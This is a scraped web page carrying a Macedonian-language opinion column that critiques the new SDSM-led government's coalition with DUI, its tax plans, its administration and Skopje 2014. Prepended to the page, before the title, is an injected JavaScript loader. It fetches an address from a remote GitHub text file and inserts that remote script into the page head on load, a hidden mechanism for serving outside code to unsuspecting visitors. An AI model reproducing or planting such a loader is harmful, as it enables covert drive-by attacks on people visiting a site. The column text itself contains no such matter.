;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Перспективи за новокадровската влада - Антропол
Став

Перспективи за новокадровската влада

Ставовите изразени во оваа колумна не нужно се совпаѓаат со ставовите на редакцијата.


Конечно, криминалната и корумпирана влада на РМ предводена од ДУИ и ДПМНЕ е соборена. Па дури и со формирањето на новата влада направен е чекор напред во процесот на отворање на можноста за општествени промени. Секако дека ова е позитивна атмосфера која владее во политичкиот простор на Македонија, се чувствува етер на ослободување и надеж за подобро утре кој граѓаните го вдишуваат насекаде деновиве. Но, самата атмосфера си носи воедно зголемување во очекувањата кај обичните граѓани, а тоа може да се прелее во уште поголема разочараност во иднина ако тие не ги почувствуваат промените на кои сега толку реално се надеваат. Од таму, сега исклучително ќе биде важно, особено за јакнење на демократските капацитети на институциите, следењето на работата на новата влада и резултатот од истата. Се надеваме дека од сега своевидната аристократија во индустријата на граѓанскиот активизам и нивната интелигенција нема како досега секоја критика кон партиите кои ја сочинуваат новата влада да ја окарактеризира и дискредитира со едноставно игнорирање и нејзино клеветење како „режимска“ и слично.

Честитки за новото мнозинство во парламентот на чело со социјалдемократите од РМ и се разбира кадровските промени во извршно-административното тело на Собранието, кое нели, треба на најдобар можен начин низ институциите да ја спроведува волјата од истото. За волја на вистината не толку ветувачки и надежен е фактот дека една од партиите која беше директен учесник (а не соучесник) во криминалите и репресијата на претходната власт исто така остана дел од новата влада. Така што, имајќи ја предвид недемократичноста и елитизмот на граѓанските партии, особено на ДУИ – имено партија за која и станува збор тука – владата не се промени суштински, туку повеќе ова се промени од кадровски тип, што и секако не се за занемарување.

Власта, во едни вакви бурни времиња на политичката историја која денес струи во светот, којшто пак е зафатен од разни кризи, а пред се` социјални, навистина е одговорна работа во рацете на партиите кои истата ја сочинуваат. Во оваа насока, мора да се забележи и тоа дека новата власт во конструкцијата на институциите на власта со бројот на безресорни министерства ја продолжи традицијата на административно џаболебарење на функционери и цели институции. Изгледа истите во согласност со традицијата само се искористени за задоволување на лукративните привезоци на партијата и подмирувањето на сметките од предизборни дилови. Да се надеваме дека ова нема да биде генерален принцип понатаму во десеминацијата на извршната власт, што потоа многу лесно се случува таквата состојба да премине и врз судската власт како и врз се` јавно во општеството да служи само како партиски декор, што впрочем беше случај со сите партии на власт во РМ од осамостојувањето до денес.

Сепак, секоја чест за одредени кадри во новата влада на РМ. Кадри кои ние сметаме дека карактерно се доволно силни да при релизирање на визијата за промени во нивните сектори нема да подлегнат на притисокот од официјалната замисла и идеја на партијата преку која се ангажирани.

Како и да е, преспективите за промени новата влада ги има, останува да видиме дали тоа ќе бидат правилните или не. Ние би предупредиле на опасност од досаден политички процес на про боно реформи несензитивни за системските промени, а со огромни суми на издатоци од државната каса. Особено сега кога состојбата со материјалните средства е доста лоша споредбено со потребата од средства за решавање на горливи и итни проблеми во заедницата во насока на подобрување на социјалниот хабитат на граѓанинот.

Се чини дека во еуфоријата од која е зафатена новата власт како да не се зборува многу за предизвиците и перспективите, односно за соочувањето со нив. Еден горлив проблем е состојбата со администрацијата. Таа освен што е премногу гломазна во исто време е неефикасна и исклучително нестручна. Впрочем, како и состојбата со целата бирократија во Македонија. Институциите се откинати една од друга, без меѓусебна комуникација и дифузни во однос на одговорноста. Се надеваме дека постои план како со неа и како истата ќе продолжи понатаму.

Подобрувањето на материјалната состојба во животот на граѓаните секако е приоритет и очекуван ангажман од секоја влада. Ние по однос на ова прашање сметаме дека социјалдемократските играња со даноците немаат сила за да ги намалат, ни малку, огромните класни разлики, напротив, тие и понатаму или ќе останат исти или ќе се зголеми таа дупка, или пак ако разликата се намали тоа ќе биде само намалување на богатството на имотната класа. Недоволно е предизборното ветување на СДСМ за воведување на прогресивен данок кој е прогресувен само по својата форма без никаква сила да направи забележителна реалокација на богатството. Оттаму уште по погубно ќе биде и финансирањето на минималната плата од буџетот на РМ во една ваква ситуација кога богатите не се оданочуваат повеќе од сиромашните. Така да или исполнувањето на ова ветување на СДСМ ќе значи дополнително задолжување или пак ќе остане само предизборна мамка, останува да видиме.

Понатаму, тука се и другите создадени проблеми од претходната власт. Еден таков е градителскиот проект Скопје 2014. Иако сметаме дека токму за поздрав е изборот на кадровскиот раководител на овој сектор направен од власта, сепак она што после се` ни е потребно во оваа област е политика на декултурализација на Македонија и од какви било политики во градење на култура. Исто така тука ќе треба и да се прошири поимот кој овој проект го опфаќа, поширок од неговиот административен опфат. Имено, се почестите никнувања на религиските храмови низ градот Скопје се сериозни нарушувања во јавниот простор. На пример, новоизградената црква на улица Македонија како и започнувањето на изградба на новата џамија во единствениот парк во населбата Топанско поле се првични предизвици во ова поле.

И за крај, можеби најтажната приказна за новата влада е реформирањето на етаблираните ДПМНЕ-вски кадри, познати по ултра либералните заложби за сувопарен прагматизам без никаква етичност и запрепастувачката сервилност кон т.н. меѓународна политика. Не може да знаеме дали ова е дел од некаков принципиелен „договор“ помеѓу „социјалното движење“ на Шарената револуција и „партиската левица“ за рушење на режимот, но сепак да се надеваме дека врбуваните кадри од граѓанското движење на Шарената револуција нема да бидат изедени од страна на власта составена од СДСМ и ДУИ.

ДСП Ленка